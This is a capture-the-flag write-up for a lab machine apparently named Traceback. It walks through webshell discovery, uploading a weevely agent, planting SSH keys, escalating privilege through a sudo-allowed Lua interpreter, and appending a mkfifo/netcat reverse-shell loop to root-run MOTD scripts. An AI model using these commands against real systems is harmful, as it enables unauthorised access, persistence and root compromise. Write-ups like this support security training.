TL;DR: finding & abusing a PHP webshell to get system access, then pe to another user with lua (sudo) and finally pe to root with a motd partial script.

Install tools used in this WU on BlackArch Linux:

pacman -S nmap gtfo dirsearch weevely

Network enumeration

Start a full port scan with nmap:

# Nmap 7.80 scan initiated Sun Mar 15 16:33:24 2020 as: nmap -sSCV -p 80,22 -oA nmap_services
Nmap scan report for
Host is up (0.025s latency).

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Sun Mar 15 16:35:12 2020 -- 1 IP address (1 host up) scanned in 108.17 seconds

HTTP discovery

On the main page source code

    <h1>This site has been owned</h1>
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<h3> - Xh4H - </h3>
<!--Some of the best web shells that you might need ;)-->

It's a hint telling us to search for web shells.

HTTP enumeration

We will try to find a web shell by enumerating available pages with dirsearch. Of course it's better to take a webshell focused dictionary for that.

$ dirsearch -u -e php -w ~/CTF/tools/SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt

_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 80

Error Log: /home/cyfun/.dirsearch/logs/errors-20-03-15_16-24-24.log


But I found no web shell with this dictionary.

A bit of OSINT

The challenge's author is Xh4H. We can find it's github profile and find a project named Web-Shells storing some common and more exotic PHP web shells.

So let's use this as a list.

Finally we found a webshell called smevk.php.

HTTP exploitation

With the webshell we can display files like /etc/passwd

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

The webshell is a cancer, so let's create & upload our own made with weevely.

Create teh webshell agent:

$ weevely generate cyfun agentcyfun.php
Generated 'agentcyfun.php' with password 'cyfun' of 781 byte size.

Upload the agent (a classic HTTP server + wget). Trigger the webshell agent:

$ weevely terminal cyfun

[+] weevely 4.0.1

[+] Target:
[+] Session: /home/cyfun/.weevely/sessions/

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)

System enumeration

Then start some system enumeration.

webadmin@traceback:/var/www/html $ ls -lhRA /home
total 8.0K
drwxr-x--- 5 sysadmin sysadmin 4.0K Mar 15 09:07 sysadmin
drwxr-x--- 5 webadmin sysadmin 4.0K Mar 15 09:08 webadmin
ls: cannot open directory '/home/sysadmin': Permission denied

total 4.3M
-rw------- 1 webadmin webadmin 90 Feb 27 05:53 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3.7K Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4.0K Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4.0K Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4.0K Feb 27 06:29 .ssh
-rwxrw-r-- 1 webadmin webadmin 870 Mar 15 09:05 cc.lua
-rwxrw-r-- 1 webadmin webadmin 332 Mar 15 09:02 ccc.lua
-rw-rw-rw- 1 webadmin webadmin 672 Mar 15 08:49 heli.lua
-rw-r--r-- 1 webadmin webadmin 672 Mar 15 09:04 krisis.lua
-rwxrwxr-x 1 sysadmin sysadmin 4.2M Aug 24 2019 luvit
-rw-rw-r-- 1 webadmin webadmin 89 Aug 24 2019 note.txt
-rw-r--r-- 1 webadmin webadmin 654 Mar 15 09:02 nowy.lua
-rw-rw-r-- 1 webadmin webadmin 648 Mar 15 09:06 privesc.lua
-rw-rw-r-- 1 webadmin webadmin 673 Mar 15 09:03 rs.lua
-rw-r--r-- 1 webadmin webadmin 332 Mar 15 09:02 shell.lua
-rw-r--r-- 1 webadmin webadmin 655 Mar 15 09:08 ssh.lua
-rw-rw-rw- 1 webadmin webadmin 29 Mar 15 09:06 test.lua

total 0
-rw-r--r-- 1 webadmin webadmin 0 Aug 23 2019

total 4.0K
drwx------ 3 webadmin webadmin 4.0K Aug 24 2019 share

total 4.0K
drwx------ 2 webadmin webadmin 4.0K Aug 24 2019 nano

total 0

total 4.0K
-rw------- 1 webadmin webadmin 1.7K Mar 15 09:06 authorized_keys

webadmin@traceback:/var/www/html $ cat /home/webadmin/note.txt
- sysadmin -
I have left this tool to practice Lua. Contact me if you have any question.

We can see a bunch of lua scripts and a hint telling us to use lua.

We can edit /home/webadmin/.ssh/authorized_keys and add pubkey to gain persistence & access a proper TTY rather than a webshell.

$ cat ~/.ssh/ 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDceD2CV1rqU+7fcduAqZ9bK4jdOQphI7J7AYUAzmHARAp/fNq4XQet3bLg73yugh72MRT6aJUWEM2iP1/gmyRgJUxx65qESG/OAUlzIOBSQUiw2sP+3++/qsBJ76y7/xfnIq/F6YDJSaqpm+eG4G4SrVqNvKNzZTYbAXJ4Fw62bAD04cvMsDeiarkS0mAZkLUzBYI8aDimHt0J2N0OGLC/hLMDZeDzjtixb/4dVNFIoRHyZv3fTNsRLDScKxxHSP+e1CUfAQ6dtlpzqAj1IW7GkaZWxBxRIyVEtFrkYSQzM/ycYtKwhXkySPbtlO1xcjr4/FpOWfYq0LiuF71+Pt/QfwYv1UKIqJ+swZlm/zb/cpu8ESARrs5mb4OTTBwb3TSmOIj5iYaEwhXGueB/Cq7TH6HQjGDZqiOOX6q1ymiGdWfkNCAj4wywaPlIB+d90NH/G0gfuk+2CFcm2us7pIvELqGh5ZqcCGdGQtqlQBsC2HdzSkiQqlGLBIDk3fcJ/ms= cyfun@penarch

$ ssh webadmin@ -i ~/.ssh/id_rsa
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -

Welcome to Xh4H land

Failed to connect to Check your Internet connection or proxy settings

Last login: Sun Mar 15 09:14:09 2020 from

We can see that we can run a command luvit as sysadmin:

webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/webadmin/luvit

webadmin@traceback:~$ sudo -u sysadmin /home/webadmin/luvit
Welcome to the Luvit repl!

Privilege Escalation of Machine : webadmin to sysadmin

luvit is just a wrapper opening a lua interpreter.

Let's create a LUA PoC to pe.

We can use gtfo to search over GTFObins.

$ gtfo -b lua

With lua it's possible to open a shell directly with os.execute("/bin/bash") or to write our SSH key to get persistence:

local file ="/home/sysadmin/.ssh/authorized_keys", "a")
file:write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDceD2CV1rqU+7fcduAqZ9bK4jdOQphI7J7AYUAzmHARAp/fNq4XQet3bLg73yugh72MRT6aJUWEM2iP1/gmyRgJUxx65qESG/OAUlzIOBSQUiw2sP+3++/qsBJ76y7/xfnIq/F6YDJSaqpm+eG4G4SrVqNvKNzZTYbAXJ4Fw62bAD04cvMsDeiarkS0mAZkLUzBYI8aDimHt0J2N0OGLC/hLMDZeDzjtixb/4dVNFIoRHyZv3fTNsRLDScKxxHSP+e1CUfAQ6dtlpzqAj1IW7GkaZWxBxRIyVEtFrkYSQzM/ycYtKwhXkySPbtlO1xcjr4/FpOWfYq0LiuF71+Pt/QfwYv1UKIqJ+swZlm/zb/cpu8ESARrs5mb4OTTBwb3TSmOIj5iYaEwhXGueB/Cq7TH6HQjGDZqiOOX6q1ymiGdWfkNCAj4wywaPlIB+d90NH/G0gfuk+2CFcm2us7pIvELqGh5ZqcCGdGQtqlQBsC2HdzSkiQqlGLBIDk3fcJ/ms= cyfun@penarch")

We have just to execute the lua interpreter as sysadmin and paste our lua PoC.

webadmin@traceback:~$ sudo -u sysadmin /home/webadmin/luvit cyfun.lua

Then we can log in as sysadmin over ssh & get the user flag.

$ ssh sysadmin@ -i ~/.ssh/id_rsa
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -

Welcome to Xh4H land

Failed to connect to Check your Internet connection or proxy settings

Last login: Sun Mar 15 09:42:11 2020 from
$ cat user.txt

Privilege Escalation of Machine : sysadmin to root

We can see that the MOTD directory is writable by sysadmin.

sysadmin@traceback:~$ ls -lh /etc/update-motd.d
total 24K
-rwxrwxr-x 1 root sysadmin 981 Mar 15 10:46 00-header
-rwxrwxr-x 1 root sysadmin 982 Mar 15 10:46 10-help-text
-rwxrwxr-x 1 root sysadmin 4.2K Mar 15 10:46 50-motd-news
-rwxrwxr-x 1 root sysadmin 604 Mar 15 10:46 80-esm
-rwxrwxr-x 1 root sysadmin 299 Mar 15 10:46 91-release-upgrade

Owned by root but writable by sysadmin so we can add any command in it. But it seems there are reset pretty often so we can do an infinite loop to append our reverse shell to /etc/update-motd.d/00-header indefinitely.

while true
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9999 >/tmp/f' >> /etc/update-motd.d/00-header

Launch a new connection ssh sysadmin@ -i ~/.ssh/id_rsa that will trigger the reverse shell as root and gain access with a listener:

$ nc -nlp 9999
/bin/sh: 0: can't access tty; job control turned off
# uid=0(root) gid=0(root) groups=0(root)